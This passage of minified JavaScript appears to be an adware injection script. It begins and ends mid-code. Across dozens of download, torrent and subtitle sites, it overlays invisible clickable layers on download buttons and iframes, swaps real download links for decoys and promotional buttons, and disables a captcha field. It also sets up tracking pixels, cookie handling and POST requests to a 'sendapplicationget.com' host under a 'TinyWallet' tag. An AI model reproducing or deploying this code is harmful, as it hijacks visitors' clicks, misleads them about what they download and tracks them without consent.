function(){this.init=function(){var h=0,e=setInterval(function(){h++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var k=0;k<document.links.length;k++)try{var l=\ndocument.links[k].href.toLowerCase();if(-1==l.indexOf(\"ww.ziddu.co\")&&-1==l.indexOf(\"#\")&&-1==l.indexOf(\"tunes.apple.co\")&&-1==l.indexOf(\"lay.google.co\")&&-1==l.indexOf(\"/gallery/\")){try{for(var m=document.links[k],n=0;15>=n;n++)m=m.parentNode;if(-1<m.className.indexOf(\"footerbg\"))continue}catch(p){}var t=document.links[k].parentNode;if(!(-1<t.className.indexOf(\"addthis_toolbox\"))){t.style.position=\"relative\";var r=document.createElement(\"div\");r.style.position=\"absolute\";r.style.left=0;r.style.top=\n0;r.style.width=\"100%\";r.style.height=\"100%\";r.style.zIndex=\"9999\";r.style.cursor=\"pointer\";t.appendChild®}}}catch(v){}l=document.getElementsByTagName(\"iframe\");for(k=0;k<l.length;k++)try{-1==l[k].src.indexOf(\"acebook.co\")&&-1==l[k].src.indexOf(\"cp.crwdcntrl.ne\")&&(t=l[k].parentNode,t.style.position=\"relative\",r=document.createElement(\"div\"),r.style.position=\"absolute\",r.style.left=0,r.style.top=0,r.style.width=\"100%\",r.style.height=\"100%\",r.style.zIndex=\"9999\",r.style.cursor=\"pointer\",r.id=k,t.appendChild®)}catch(w){}}20<\nh&&clearInterval(e)},500)}};this[\"pensubtitles.us\"]=new function(){this.init=function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var h=document.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e);if(h=h.children[0]){var k=h.children[0];k&&(k.setAttribute(\"href\",\"javascript:void(0);\"),\nk.setAttribute(\"target\",\"_self\"))}}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var l=0;l<h.children.length;l++)if(\"span\"==h.children[l].tagName.toLowerCase()){var m=h.children[l],e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"106%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.left=\"-6%\";e.style.zIndex=\"2000\";if(k=m.children[0])k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\");m.style.position=\"relative\";\nm.appendChild(e)}}}};this[\"opensubtitles.org\"]=new function(){this.init=function(){new function(){var h=document.getElementById(\"scrubbuad\");h&&(h.style.zIndex=\"15\",e=document.createElement(\"div\"),e.style.zIndex=\"15000\",e.style.right=\"9px\",e.style.bottom=\"0\",e.style.position=\"fixed\",e.style.padding=\"0\",e.style.margin=\"0 0 30px 0\",e.style.width=\"220px\",e.style.height=\"72px\",e.style.overflow=\"visible\",e.style.cursor=\"pointer\",document.getElementsByTagName(\"body\")[0].firstChild.appendChild(e));if(-1<\nwindow.location.href.indexOf(\"/opensubtitles-playe\")){h=document.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e)}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var k=0;k<h.children.length;k++)if(\"span\"==h.children[k].tagName.toLowerCase()){var l=h.children[k],e=document.createElement(\"div\");\ne.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.zIndex=\"2000\";l.style.position=\"relative\";l.appendChild(e)}}for(h=0;h<document.links.length;h++)e=document.links[h],(k=e.getAttribute(\"href\"))&&-1<k.indexOf(\"ads2.opensubtitles.org/www/delivery/ck.php\")&&(k=p.utils.duplicateElement(e),l=e.parentNode,l.insertBefore(k,e),l.removeChild(e))}}};this[\"romptfile.co\"]=new function(){this.init=function(){if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var h=\n{},e=document.getElementsByTagName(\"iframe\"),k=0;k<e.length;k++)\"300\"==e[k].getAttribute(\"width\")&&\"250\"==e[k].getAttribute(\"height\")&&(h=e[k].parentNode);h.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";h.appendChild(d)}}};this[\"pensoftwareupdater.co\"]=new function(){this.init=function(){new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==\ntypeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var h=$(\".download\").parent();h.css(\"position\",\"relative\");var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"100%\";e.style.width=\"122px\";e.style.right=\"0\";e.style.top=\"0\";e.style.cursor=\"pointer\";h.append(e);h=$(\"#addBoxX\").parent();h.css(\"position\",\"relative\");e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"45px\";e.style.width=\"101px\";\ne.style.right=\"22px\";e.style.bottom=\"16px\";e.style.cursor=\"pointer\";h.append(e);window.__qqcount++;10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var h=document.links,e={},k={},l=0;l<h.length;l++)e=h[l].getAttribute(\"href\"),null!=e&&-1<e.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(e=h[l].getAttribute(\"id\"),null!=e&&\"addBoxX\"==e?(k=h[l].parentNode,k.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\n\"45px\",e.style.width=\"101px\",e.style.right=\"22px\",e.style.bottom=\"16px\"):(k=h[l].parentNode,k.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\"100%\",e.style.width=\"122px\",e.style.right=\"0\",e.style.top=\"0\"),e.style.cursor=\"pointer\",k.appendChild(e))}}};this[\"veehd.com\"]=new function(){this.init=function(){new function(){if(-1<window.location.href.indexOf(\"veehd.com/video/\")){var h=document.getElementsByTagName(\"iframe\")[0],\ne={};null!=h&&(h=h.parentNode,e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e));h=document.getElementById(\"preview\");null!=h&&(e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e))}else for(var e=\ndocument.getElementsByTagName(\"a\"),k=0;k<e.length;k++)if(\"getDownload();\"==e[k].getAttribute(\"onclick\")){h=document.createElement(\"a\");h.style.cursor=\"pointer\";var l=document.createElement(\"img\");l.setAttribute(\"src\",e[k].children[0].getAttribute(\"src\"));l.setAttribute(\"border\",\"0\");h.appendChild(l);l=e[k].parentNode;l.removeChild(e[k]);e=l.getElementsByTagName(\"div\")[0];l.insertBefore(h,e);break}}}};this[\"ullypcgames.ne\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var h=\ndocument.getElementsByTagName(\"center\"),e=0;e<h.length;e++){var k=h[e].firstChild;\"undefined\"!==typeof k.tagName&&\"a\"==k.tagName.toLowerCase()&&(h[e].style.position=\"relative\",k=document.createElement(\"div\"),k.style.position=\"absolute\",k.style.top=\"0\",k.style.left=\"0\",k.style.width=\"100%\",k.style.height=\"100%\",k.style.zIndex=\"2000\",k.style.cursor=\"pointer\",h[e].appendChild(k))}}};this[\"llplayer.com.b\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var h=\ndocument.getElementsByTagName(\"img\"),e=0;e<h.length;e++)if(h[e].getAttribute(\"src\")&&-1<h[e].getAttribute(\"src\").indexOf(\"fullpage_eng.png\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\"pointer\";var l=h[e].parentNode.parentNode;l.style.position=\"relative\";l.appendChild(k)}}};this[\"ubtitulosespanol.or\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var h=\ndocument.links;for(i=0;i<h.length;i++)if(\"Descargue su subt\\u00edtulo aqu\\u00ed\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"ubtitles4free.ne\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var h=\ndocument.links;for(i=0;i<h.length;i++)if(\"Download Subtitle\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Download Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"legendasbrasil.org\"]=new function(){this.init=function(){if(0<\nlocation.host.toLowerCase().indexOf(\"legendasbrasil.org\")){var h=document.links;for(i=0;i<h.length;i++)if(\"Baixar Legenda\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixar Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixe sua legenda aqui\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";\nvar k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"reeroms.co\"]=new function(){this.init=function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var h=document.getElementsByTagName(\"a\"),e=0;e<h.length;e++){var k=\"undefined\"===typeof h[e].innerText?h[e].textContent:h[e].innerText,k=k.trim();if(\"Download\"===k||0==k.indexOf(\"Direct\")){var l=document.createElement(\"div\");\nl.style.width=\"100%\";l.style.height=\"100%\";l.style.position=\"absolute\";l.style.zIndex=\"9999\";l.style.top=\"0\";l.style.cursor=\"pointer\";var m=h[e].parentNode;m.style.position=\"relative\";m.appendChild(l);0==k.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}};this[\"eneral-ebooks.co\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var h=\ndocument.getElementsByTagName(\"iframe\"),e=0;e<h.length;e++){var k=h[e].parentNode;if(null!=k){var l=k.getAttribute(\"class\");null!=l&&-1<l.indexOf(\"banner-body\")&&(l=document.createElement(\"div\"),l.style.width=\"100%\",l.style.height=\"100%\",l.style.position=\"absolute\",l.style.zIndex=\"9999\",l.style.top=\"0\",l.style.cursor=\"pointer\",k.style.position=\"relative\",k.appendChild(l))}}}};this[\"stream2watch.me\"]=new function(){this.init=function(){-1<location.host.toLowerCase().indexOf(\"stream2watch.me\")&&(window.__z_tream2count=\n0,window.__z_tream2int=setInterval(function(){20<window.__z_tream2count++&&clearInterval(window.__z_tream2int);var h=document.getElementById(\"rh_toolbar_STRTOPB\"),e=document.getElementById(\"rhfrm_STRTOPB\");if(null!=h&&null!=e){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";h.appendChild(k);e.style.position=\"absolute\";e.style.zIndex=\"-1\";clearInterval(window.__z_tream2int)}},500))}};this[\"old_ki_ckass.to\"]=\nnew function(){var h=this;h.init=function(){location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href&&(h.counter=0,h.kickass=function(){20<++h.counter&&clearInterval(h.interval);var e=p.utils.query_selector_all(\".advertDownload\");if(0<e.length){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";k.style.top=\"0\";k.style.left=\"0\";e[0].appendChild(k);e[0].style.position=\"relative\";e[0].style.overflow=\n\"hidden\";e=e[0].getElementsByTagName(\"a\");for(k=0;k<e.length;k++)e[k].setAttribute(\"href\",\"javascript:void(0);\"),e[k].setAttribute(\"onclick\",\"void(0);\");clearInterval(h.interval)}},h.interval=setInterval(h.kickass,500))}};this[\"kickass.to\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);for(var e=document.getElementsByTagName(\"div\"),\nk=0;k<e.length;k++){var l=e[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=e[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";n.appendChild(p);e[k].removeChild(m);\ne[k].appendChild(n);clearInterval(h.___ZskskskInter)}}}}catch(u){clearInterval(h.___ZskskskInter)}};h.___ZskskskInter=setInterval(h.___ZskskskthisZ,500);for(var e=p.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<e.length;k++){var l=e[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var n=document.createElement(\"span\");m.appendChild(n);n=e[k].parentNode;l?n.insertBefore(m,l):n.appendChild(m);n.removeChild(e[k])}h.counter=\n0;h.kickassx=function(){20<++h.counter&&clearInterval(h.interval);0<p.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(h.interval))};h.interval=setInterval(h.kickassx,500);h.counterClick=0;h.kickassClick=function(){20<++h.counterClick&&clearInterval(h.interval2);var e=p.utils.query_selector_all(\".block.botmarg5px\")[0];\ne&&\"Download faster CLICK HERE\"==(e.innerText?e.innerText:e.textContent)&&(e.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"kickass.so\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);\nfor(var e=document.getElementsByTagName(\"div\"),k=0;k<e.length;k++){var l=e[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=e[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";\nn.appendChild(p);e[k].removeChild(m);e[k].appendChild(n);clearInterval(h.___ZskskskInter)}}}}catch(u){clearInterval(h.___ZskskskInter)}};h.___ZskskskInter=setInterval(h.___ZskskskthisZ,500);for(var e=p.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<e.length;k++){var l=e[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var n=document.createElement(\"span\");m.appendChild(n);n=e[k].parentNode;l?n.insertBefore(m,l):\nn.appendChild(m);n.removeChild(e[k])}h.counter=0;h.kickassx=function(){20<++h.counter&&clearInterval(h.interval1);0<p.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(h.interval1))};h.interval1=setInterval(h.kickassx,500);h.counterClick=0;h.kickassClick=function(){20<++h.counterClick&&clearInterval(h.interval2);\nvar e=p.utils.query_selector_all(\".block.botmarg5px\")[0];e&&\"Download faster CLICK HERE\"==(e.innerText?e.innerText:e.textContent)&&(e.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"uploadrocket.net\"]=new function(){this.init=function(){var h=p.utils.query_selector_all(\".dlbutton_green\");if(h&&0<h.length){var h=h[0],e=document.createElement(\"a\");e.className=\"dlbutton_green\";\ne.setAttribute(\"href\",\"javascript:void(0)\");var k=document.createElement(\"span\");k.innerText?k.innerText=\"Download Now\":k.textContent=\"Download Now\";e.appendChild(k);k=h.parentNode;k.removeChild(h);k.appendChild(e)}(h=p.utils.query_selector_all(\".middle\"))&&0<h.length&&(h=h[0].children[4])&&h.setAttribute(\"href\",\"javascript:void(0);\");if((h=p.utils.query_selector_all(\"#ID_freeorpremium table tr td a\"))&&0<h.length)for(e=0;e<h.length;e++)h[e].setAttribute(\"href\",\"javascript:void(0);\");(h=p.utils.query_selector_all(\"#ID_freeorpremium input[type='submit']\"))&&\n0<h.length&&h[0].setAttribute(\"type\",\"button\");(h=p.utils.query_selector_all(\"#ID_freeorpremium\"))&&0<h.length&&(h=h[0])&&(h.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.width=\"100%\",e.style.height=\"95px\",e.style.zIndex=\"2000\",e.style.top=\"0\",e.style.cursor=\"pointer\",h.appendChild(e))}};this[\"programas-gratis.net\"]=new function(){this.init=function(){for(var h=p.utils.query_selector_all(\".list.new .download_button\"),e=0;e<h.length;e++){var k=h[e].parentNode;\nk.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"124px\";l.style.height=\"42px\";l.style.zIndex=\"2000\";l.style.top=\"44px\";l.style.right=\"9px\";l.style.cursor=\"pointer\";k.appendChild(l);h[e].setAttribute(\"href\",\"javascript:void(0)\")}}};this[\"programasgratis.es\"]=new function(){this.init=function(){for(var h=p.utils.query_selector_all(\"#bloque_top_portada .programa_top_portada a\"),e=0;e<h.length;e++)if(h[e].setAttribute(\"href\",\"javascript:void(0)\"),\n\"rojo\"!=h[e].className){var k=h[e].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"100%\";l.style.height=\"152px\";l.style.zIndex=\"2000\";l.style.top=\"0\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l)}h=p.utils.query_selector_all(\".bloque_novedades .link_categoria_descargar\");for(e=0;e<h.length;e++)k=h[e].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\n\"124px\",l.style.height=\"42px\",l.style.zIndex=\"2000\",l.style.top=\"-5px\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),h[e].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"programasejogos.com\"]=new function(){this.init=function(){for(var h=p.utils.query_selector_all(\".enlace_pestania_descargar\"),e=0;e<h.length;e++){var k=h[e].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"200px\";l.style.height=\"90px\";l.style.zIndex=\n\"2000\";l.style.top=\"65px\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l);h[e].setAttribute(\"href\",\"javascript:void(0)\")}h=[];h=h.concat(p.utils.query_selector_all(\".linea_fondo1 .enlace_pestania_descargar_pequeno\"));h=h.concat(p.utils.query_selector_all(\".linea_fondo1 .boton_clase_listado\"));h=h.concat(p.utils.query_selector_all(\".linea_fondo .enlace_pestania_descargar_pequeno\"));for(e=0;e<h.length;e++)for(var m=0;m<h[e].length;m++)k=h[e][m].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),\nl.style.position=\"absolute\",l.style.width=\"115px\",l.style.height=\"28px\",l.style.zIndex=\"2000\",l.style.top=\"0\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),h[e][m].setAttribute(\"href\",\"javascript:void(0)\");h=p.utils.query_selector_all(\".pyj_registro_inferior .enlace_pestania_descargar_pequeno\");for(e=0;e<h.length;e++)k=h[e].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\"105px\",l.style.height=\"29px\",l.style.zIndex=\"2000\",\nl.style.top=\"3px\",l.style.right=\"-4px\",l.style.cursor=\"pointer\",k.appendChild(l),h[e].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"uploading.com\"]=new function(){this.init=function(){setTimeout(function(){var h=p.utils.query_selector_all(\".method_title\")[0];if(h){var e=h.parentNode,k=document.createElement(\"div\");k.className=\"method_title\";var l=document.createElement(\"i\"),m=document.createElement(\"span\");m.setAttribute(\"id\",\"timer_count\");m.innerText=\"Download for free\";m.textContent=\"Download for free\";\nk.appendChild(l);k.appendChild(m);e.insertBefore(k,h);e.removeChild(h)}},1E3)}};this[\"flexydrive.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"media1fire.com\"]=new function(){this.init=function(){var h=p.utils.query_selector_all('input[name=\"adcopy_response\"]');0<h.length&&(h[0].disabled=\n!0);for(h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"softwareandgames.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"softwareandgames.com/download\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};\nthis[\"programmesetjeux.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"programmesetjeux.com/telecharger\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"baixarjogos.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"baixarjogos.com/baixar\")){var k=\np.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"descargarjuegos.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"descargarjuegos.com/descargar\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"hotfiles.ro\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],\nk=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"hotfil.es/goref.php\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"vitanclub.net\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"/ad/goref.php\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}h=document.getElementById(\"container_bottom\");p.utils.coverElement(h)}};\nthis[\"mirrorcreator.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&(-1<k.indexOf(\"getsecuredfiles.com/mirrorc\")||-1<k.indexOf(\"westzip.in/\"))){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"mestorrents.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"pubted.com/www/delivery/\")){var k=\np.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"vitorrent.net\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"/file.php\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this.injectHidden=function(){var h=document.createElement(\"input\");h.type=\"hidden\";h.setAttribute(\"id\",\"sadkf345hks78923dkcvsdf\");document.getElementsByTagName(\"body\")[0].appendChild(h)};\nif(!document.getElementById(\"sadkf345hks78923dkcvsdf\"))if(\"undefined\"!==typeof this[location.host]&&this.activeZds[location.host]&&window.self==window.top&&1==this.activeZds[location.host])this[location.host].init(),this.injectHidden();else for(var u in this.activeZds)if(-1<location.host.indexOf(u)&&1==this.activeZds[u])try{this[u].init(),this.injectHidden()}catch(y){}};;window.top==window.self&&new function(){if(!document.getElementsByTagName(\"body\").length||!document.getElementsByTagName(\"body\")[0].getAttribute(\"s4273800016501002566\")){var m=document.getElementsByTagName(\"body\")[0];m&&m.setAttribute(\"s4273800016501002566\",\"1\");var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"TinyWallet\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var f=a[e];b=new Image;b.src=f}else b=new Image,b.src=a};a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+ c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(b,d){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",b,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&d(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(b, d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof 